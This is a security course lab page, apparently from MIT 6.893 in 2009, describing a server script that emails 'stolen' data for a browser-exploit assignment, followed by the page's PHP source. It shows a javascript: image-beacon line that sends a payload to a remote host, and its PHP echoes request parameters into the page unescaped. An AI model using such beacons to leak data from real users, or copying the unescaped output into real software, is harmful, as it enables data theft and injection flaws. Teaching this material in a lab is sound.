Lab 3 Email Script

You can use this server side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by our web server (pdos.csail.mit.edu). Another copy of the email always goes to 6.893-sendmail@pdos.csail.mit.edu so that we can monitor abuse and you can receive credit for your work. (Don't worry about spamming our account while you test out your exploits; we will ignore mail to that address until we actually grade your submissions.) 

javascript:void((new Image()).src='http://pdos.csail.mit.edu/6.893/2009/labs/lab3/sendmail.php?' + 'to=youremailhere@mit.edu' + '&payload=xyz' + '&random=' + Math.random());

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. The void(...); construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like javascript:2+2).

Test form

If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)

To: (@mit.edu e-mail address)
Payload: (the information you stole)

This script from last year has been disabled.

Source code

In case you are curious, here is the source code of this page.

<?php
  $to = $_GET['to'] ? $_GET['to'] : "youremailhere@mit.edu";
  $payload = $_GET['payload'] ? $_GET['payload'] : "xyz";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<link rel="stylesheet" type="text/css" href="../labs.css" />
<title>Lab 3 Email Script</title>
</head>

<body>
<h1>Lab 3 Email Script</h1>
<p>You can use this server side script to send automated
emails from client-side JavaScript. For example, clicking this
client-side hyperlink will cause an email to be sent by our 
web server (pdos.csail.mit.edu). Another copy of the email
always goes to 6.893-sendmail@pdos.csail.mit.edu so that we
can monitor abuse and you can receive credit for your work.
(Don't worry about spamming our account while you test out
your exploits; we will ignore mail to that address until
we actually grade your submissions.)
</p>
    <blockquote><pre class="tty"><?php 
    $link = "javascript:void((new" .
            " Image()).src=" . 
            "'http://pdos.csail.mit.edu/6.893/2009/labs/lab3/sendmail.php?'" . 
            " + 'to=$to'" .
            " + '&payload=$payload' + '&random='" . 
            " + Math.random());";
    echo "<a href=\"$link\">$link</a>";
    ?></pre></blockquote>
    <p>The random argument is ignored, but ensures that the browser 
bypasses its cache when downloading the image. We suggest that you use 
the random argument in your scripts as well. Newlines are not allowed 
in <tt>javascript:</tt> links; if this bothers you, try 

<a href="http://scriptasylum.com/tutorials/encdec/encode-decode.html">URL encoding</a>.
The <code>void(...);</code> construct prevents the browser from 
navigating to a new page consisting of the contents
of the expression (which is what it normally does when it encounters a 
non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p>
<h2>Test form</h2>
<p>If you just want to try out the script, you can use this form.
      (For the programming project, you'll probably
want to use the JavaScript image technique shown above.)</p>
<form method="get">
<div>
<b>To:</b> 
<input name="to" value="<?php echo $to; ?>" size="40" /><i>(@mit.edu e-mail address)
</div>
<div>
</div>
<div>
<b>Payload:</b>
<input name="payload" value="<?php echo $payload; ?>" size="40" />
<i>(the information you stole)</i>
</div>
<div>
<input type="submit" value="Send Email" name="send_submit" />

<H1>This script from last year has been disabled.</H1>
<?php
  if(0 && $_REQUEST['to']) {
    if(!preg_match("/@mit.edu$/i", $_REQUEST['to'])) {
      echo "Please use an @mit.edu e-mail address";
    } else {
      $to = "6.893-sendmail@pdos.csail.mit.edu";
      if (!preg_match("/Lab Grader/i", $_SERVER['HTTP_USER_AGENT']))
        $to .= ", "  . $_REQUEST['to'];
      $subject = "Message from " . $_REQUEST['to'];
      $message = "Payload:\n\n$payload";
      mail($to, $subject, $message);
      echo "<em>Sent!</em>";
    }
  }
?>
</div>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
</form>
</div>
</div>
</div>
</body>
</html>